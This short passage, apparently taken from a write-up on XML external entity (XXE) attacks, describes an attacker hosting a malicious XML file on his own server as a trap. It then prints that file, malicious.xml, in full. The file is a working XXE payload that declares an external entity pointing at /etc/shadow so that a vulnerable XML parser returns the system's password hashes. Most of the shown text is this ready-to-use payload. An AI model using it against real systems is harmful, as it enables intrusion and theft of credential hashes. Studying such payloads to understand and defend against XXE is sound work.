He then hosts the malicious XML file on his own server as part of the trap.
malicious.xml
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xrds [ <!ENTITY passwords SYSTEM "file://etc/shadow"> ]> <xrds> &passwords; </xrds>